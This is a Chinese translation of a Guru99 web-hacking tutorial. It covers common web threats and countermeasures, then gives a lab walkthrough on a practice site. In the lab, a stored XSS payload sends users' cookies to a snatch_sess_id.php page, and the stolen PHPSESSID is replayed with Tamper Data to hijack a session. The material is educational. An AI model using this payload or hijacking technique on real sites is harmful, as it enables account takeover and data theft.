# 如何破解網站：在線示例 > 原文： [https://www.guru99.com/how-to-hack-website.html](https://www.guru99.com/how-to-hack-website.html) 訪問互聯網的人數比以往任何時候都要多。 這促使許多組織開發基于 Web 的應用程序，用戶可以在線使用這些應用程序與組織進行交互。 可以利用 Web 應用程序編寫不良的代碼來獲得對敏感數據和 Web 服務器的未經授權的訪問。 在本文中，我們將向您介紹 **Web 應用程序黑客技術，以及可以用來防范此類攻擊的對策**。 ## **本教程涵蓋的主題** * [什么是 Web 應用程序？ 什么是網絡威脅？](#1) * [如何保護您的網站免受黑客攻擊？](#2) * [黑客活動：黑客網站！](#3) ## 什么是 Web 應用程序？ 什么是網絡威脅？ Web 應用程序（又稱網站）是基于客戶端-服務器模型的應用程序。 服務器提供數據庫訪問和業務邏輯。 它托管在 Web 服務器上。 客戶端應用程序在客戶端 Web 瀏覽器上運行。 Web 應用程序通常使用 Java，C＃和 VB.Net，PHP，ColdFusion 標記語言等語言編寫。Web 應用程序中使用的數據庫引擎包括 MySQL，MS [SQL](/sql.html) Server，PostgreSQL，SQLite， 等等 大多數 Web 應用程序都托管在可通過 Internet 訪問的公共服務器上。 由于易于訪問，這使它們容易受到攻擊。 以下是常見的 Web 應用程序威脅。 * **SQL 注入** –這種威脅的目標可能是繞過登錄算法，破壞數據等。 * **拒絕服務攻擊** –此威脅的目標可能是拒絕合法用戶訪問資源 * **跨站點腳本 XSS** –這種威脅的目標可能是注入可以在客戶端瀏覽器上執行的代碼。 * **Cookie /會話中毒** –此威脅的目標是攻擊者修改 Co??okie /會話數據以獲得未經授權的訪問。 * **表單篡改** –此威脅的目的是修改電子商務應用程序中的表單數據（例如價格），以便攻擊者可以降低的價格獲取商品。 * **代碼注入** –這種威脅的目標是注入可以在服務器上執行的代碼，例如 PHP，Python 等。 該代碼可以安裝后門，顯示敏感信息等。 * **污損** –此威脅的目的是修改網站上顯示的頁面，并將所有頁面請求重定向到包含攻擊者消息的單個頁面。 ## 如何保護您的網站免受黑客攻擊？ 組織可以采用以下策略來保護自己免受 Web 服務器攻擊。 * **SQL Injection** -在將用戶參數提交給數據庫進行處理之前對其進行清理和驗證可以幫助減少通過 SQL Injection 受到攻擊的機會。 數據庫引擎（例如 MS SQL Server，MySQL 等）支持參數和準備好的語句。 它們比傳統的 SQL 語句安全得多 * **拒絕服務攻擊–如果攻擊是簡單的 DoS，則**防火墻可用于阻止來自可疑 IP 地址的流量。 正確配置網絡和入侵檢測系統也可以幫助減少 DoS 攻擊成功的機會。 * **跨站點腳本–** 驗證和清除標頭，通過 URL 傳遞的參數，表單參數和隱藏值可以幫助減少 XSS 攻擊。 * **Cookie /會話中毒** –可以通過加密 cookie 的內容，在一段時間后使 cookie 超時，將 cookie 與用于創建它們的客戶端 IP 地址相關聯來防止這種情況。 * **模板回火–** 可以通過在處理用戶輸入之前對其進行驗證并進行驗證來防止這種情況。 * **代碼注入-**可以通過將所有參數視為數據而非可執行代碼來防止。 可以使用“消毒和驗證”來實現此目的。 * **損壞–** 良好的 Web 應用程序開發安全策略應確保它密封了訪問 Web 服務器的常用漏洞。 開發 Web 應用程序時，這可以是對操作系統，Web 服務器軟件和最佳安全性實踐的正確配置。 ## 黑客活動：黑客網站 在這種實際情況下，我們將劫持位于 [www.techpanda.org](http://www.techpanda.org/) 的 Web 應用程序的用戶會話。 我們將使用跨站點腳本來讀取 cookie 會話 ID，然后使用它來模擬合法的用戶會話。 假定攻擊者可以訪問 Web 應用程序，并且他想劫持使用同一應用程序的其他用戶的會話。 該攻擊的目標可能是假設攻擊者的訪問帳戶受到限制，從而獲得對 Web 應用程序的管理員訪問權限。 **使用入門** * 打開 [http://www.techpanda.org/](http://www.techpanda.org/) * 出于實踐目的，強烈建議使用 SQL Injection 獲得訪問權限。 有關如何執行此操作的更多信息，請參見此[文章](/learn-sql-injection-with-practical-example.html)。 * 登錄電子郵件為，此電子郵件地址已受到防止垃圾郵件機器人的保護。 您需要啟用 JavaScript 才能查看它。 ，密碼為 Password2010 * 如果您已成功登錄，則將獲得以下信息中心  * 點擊添加新聯系人 * 輸入以下內容作為名字 < a href =＃onclick = \“ document.location = \'http：//techpanda.org/snatch_sess_id.php？c = \'+ escape \（document.cookie \）\; \” >暗 < / a > **此處，** **上面的代碼使用 JavaScript** 。 **它將添加帶有 onclick 事件的超鏈接**。 當毫無戒心的用戶單擊鏈接時，事件將檢索 [PHP](/php-tutorials.html) Cookie 會話 ID，并將其與 URL 中的會話 ID 一起發送到 snatch_sess_id.php 頁面。  * 輸入其余詳細信息，如下所示 * 點擊保存更改  * 現在，您的儀表盤將如下圖所示  * 由于跨站點腳本代碼存儲在數據庫中，因此每次具有訪問權限的用戶登錄時都會加載該代碼 * 假設管理員登錄并單擊顯示為 Dark 的超鏈接 * 他/她將獲得在 URL 中顯示會話 ID 的窗口  ***注意*** *：腳本可能會將值發送到存儲 PHPSESSID 的某個遠程服務器，然后用戶重定向回網站，就好像什么都沒發生。* ***注意*** *：您獲得的值可能與本教程中的值不同，但概念相同* ## *使用 Firefox 和篡改數據插件的會話模擬* 下面的流程圖顯示了完成此練習必須采取的步驟。  * 您需要此部分的 Firefox Web 瀏覽器和篡改數據附加組件 * 打開 Firefox 并安裝添加，如下圖所示   * 搜索篡改數據，然后單擊安裝，如上所示  * 單擊接受并安裝…   * 安裝完成后，單擊立即重新啟動 * 如果未顯示，請在 Firefox 中啟用菜單欄  * 單擊工具菜單，然后選擇篡改數據，如下所示  * 您將獲得以下窗口。 注意：如果 Windows 不為空，請單擊清除按鈕  * 單擊開始篡改菜單 * 切換回 Firefox Web 瀏覽器，輸入 [http://www.techpanda.org/dashboard.php](http://www.techpanda.org/dashboard.php) ，然后按 Enter 鍵加載頁面 * 您將從篡改數據中看到以下彈出窗口  * 彈出窗口具有三（3）個選項。 **篡改選項允許您在將 HTTP 標頭信息提交到服務器**之前對其進行修改。 * 點擊它 * 您將獲得以下窗口  * 復制您從攻擊 URL 復制的 PHP 會話 ID，并將其粘貼在等號后。 您的價值現在應該像這樣 PHPSESSID = 2DVLTIPP2N8LDBN11B2RA76LM2 * 點擊確定按鈕 * 您將再次獲得“篡改數據”彈出窗口  * 取消選中要求繼續篡改的復選框。 * 完成后單擊提交按鈕 * 您應該能夠看到如下所示的儀表板  ***注意*** *：我們沒有登錄，我們使用跨站點腳本檢索的 PHPSESSID 值模擬了登錄會話* ## 摘要 * Web 應用程序基于服務器-客戶端模型。 客戶端使用 Web 瀏覽器訪問服務器上的資源。 * Web 應用程序通常可以通過 Internet 訪問。 這使他們容易受到攻擊。 * Web 應用程序威脅包括 SQL 注入，代碼注入，XSS，污損，Cookie 中毒等。 * 開發 Web 應用程序時，好的安全策略可以幫助確保它們的安全性。